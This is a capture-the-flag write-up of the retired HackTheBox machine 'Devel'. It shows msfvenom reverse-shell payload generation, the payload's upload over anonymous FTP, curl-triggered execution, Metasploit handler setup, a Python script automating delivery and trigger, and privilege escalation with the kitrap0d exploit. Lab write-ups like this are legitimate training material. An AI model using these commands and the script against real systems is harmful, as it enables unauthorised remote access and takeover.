This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Machine IP: 10.10.10.5
As always, I start enumeration with AutoRecon. The open ports are TCP/21 and TCP/80. While AutoRecon continues scanning, I look into the FTP server. It allows anonymous login! I note that in my mind map and leave it for now to check on the results of AutoRecon.
I look at what the nmap HTTP script scan found:
At the bottom of the results, I see a CVE was found:
I see this CVE is tied to MS15-034 and run that through searchsploit:
I take a look at the C exploit:
I see that the main body of the exploit is simply a check of whether the target is vulnerable to this CVE; it does not give me code execution.
Well, that is still useful, so let's compile and execute the code:
Great. Now what?
I back off and take another look at my enumeration results. I know this is a Windows machine because the server at TCP/80 is running IIS. I know it has a CVE. I know that I have anonymous access via FTP to the server, to a directory that appears to host the web server’s files.
Let’s generate a reverse TCP meterpreter payload with msfvenom, push it to the target via FTP, then call it from the web server to execute and establish a shell back to my box.
The payload command is:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.33 LPORT=4444 -f aspx > devel.aspx
Substitute the LHOST and LPORT as applicable for your system.
I can now push the file via FTP:
ftp 10.10.10.5
# log in as anonymous, then:
ftp> put ./devel.aspx
Then I need to start a meterpreter handler on my machine listening on LPORT.
sudo msfconsole
msf> workspace htb
msf> use payload/windows/meterpreter/reverse_tcp
I just need to set my local IP (the same LHOST I gave msfvenom):
msf> set LHOST 10.10.14.33
Then I can set up a local listener by converting this payload to a handler, which starts a multi/handler job with the payload's options already filled in:
msf> to_handler
I can now execute my payload with a curl command; IIS compiles and runs the ASPX on the first request, and the shellcode calls back to the handler:
curl http://10.10.10.5/devel.aspx
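The upload-and-trigger chain from the steps above, as an added Python example that is not part of the original post: it builds the msfvenom argv, uploads a random marker over anonymous FTP and fetches it over HTTP to prove the FTP root really is the web root (worth doing before you burn a payload), then uploads the .aspx and requests it once so IIS compiles and runs it. The handler still has to be listening in msfconsole before the trigger. The function names, the anonymous password `anonymous@`, and the injectable `put`/`get` callables are my own; the target, LHOST, LPORT and file name are the values used above.

```python
import ftplib
import io
import secrets
import shlex
import urllib.error
import urllib.request

TARGET = "10.10.10.5"               # the box
LHOST, LPORT = "10.10.14.33", 4444  # attacker side, as given to msfvenom above
PAYLOAD_FILE = "devel.aspx"


def msfvenom_argv(lhost, lport, out_path=PAYLOAD_FILE):
    """argv for the msfvenom call used above (run it via subprocess if desired)."""
    return ["msfvenom", "-p", "windows/meterpreter/reverse_tcp",
            f"LHOST={lhost}", f"LPORT={lport}", "-f", "aspx", "-o", out_path]


def ftp_put(host, name, data, user="anonymous", password="anonymous@"):
    """Upload bytes as `name` over FTP and confirm it shows up in the listing."""
    with ftplib.FTP(host, timeout=15) as ftp:
        ftp.login(user, password)
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))
        return name in ftp.nlst()


def http_get(base_url, name):
    """Fetch base_url/name; return (status, body). 4xx/5xx come back as (code, b'')."""
    try:
        with urllib.request.urlopen(f"{base_url.rstrip('/')}/{name}", timeout=15) as r:
            return r.status, r.read()
    except urllib.error.HTTPError as e:
        return e.code, b""


def ftp_root_is_webroot(put, get):
    """Drop a harmless random marker via FTP and check HTTP serves it back verbatim.

    `put(name, data) -> bool` and `get(name) -> (status, body)` are injected so
    the logic can be exercised without a live target.
    """
    name = f"probe_{secrets.token_hex(4)}.txt"
    body = secrets.token_hex(16).encode()
    if not put(name, body):
        return False
    status, served = get(name)
    return status == 200 and served == body


def deliver_and_trigger(put, get, name, payload):
    """Upload the ASPX and request it once; IIS compiles and executes it on that
    first hit, which is what fires the reverse connection to the handler."""
    if not put(name, payload):
        raise RuntimeError(f"upload of {name} failed or file not listed")
    status, _ = get(name)
    return status


if __name__ == "__main__":
    put = lambda n, d: ftp_put(TARGET, n, d)
    get = lambda n: http_get(f"http://{TARGET}", n)
    print("generate with:", shlex.join(msfvenom_argv(LHOST, LPORT)))
    if not ftp_root_is_webroot(put, get):
        raise SystemExit("FTP root is not served by the web server; pick another route")
    with open(PAYLOAD_FILE, "rb") as f:
        print("trigger returned HTTP", deliver_and_trigger(put, get, PAYLOAD_FILE, f.read()))
```

The marker probe is the piece worth keeping even if you do the rest by hand: it separates "anonymous FTP is writable" from "what I write is executed by the web server", which are two different findings on a real engagement.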
Meterpreter records the session (ignore the whoami -> root command, I was confused about which terminal I was in):
I can now connect to the session I’ve created:
Now let’s gather information on the system and check what user I am:
Ok, this is a Windows 7 machine with x86 architecture. I am logged in as the IIS user, which isn't going to give me much. I can't even write to my current directory. But I should be able to write to C:\Windows\TEMP. I navigate over there and then use local_exploit_suggester to suggest some exploit modules I can run to elevate my shell.
The machine seems to be vulnerable to exploit/windows/local/bypassuac_eventvwr, so let's try that.
It is unsuccessful, as my IIS user isn't in the Administrators group: a UAC bypass only lifts an administrator's filtered medium-integrity token to a high-integrity one, so it does nothing for a non-admin service account. On to the next.
The second exploit, exploit/windows/local/ms10_015_kitrap0d, is successful. It is a kernel exploit (MS10-015) for 32-bit Windows, so it does not care which group the current user is in.
I can now go and retrieve the user and root flags.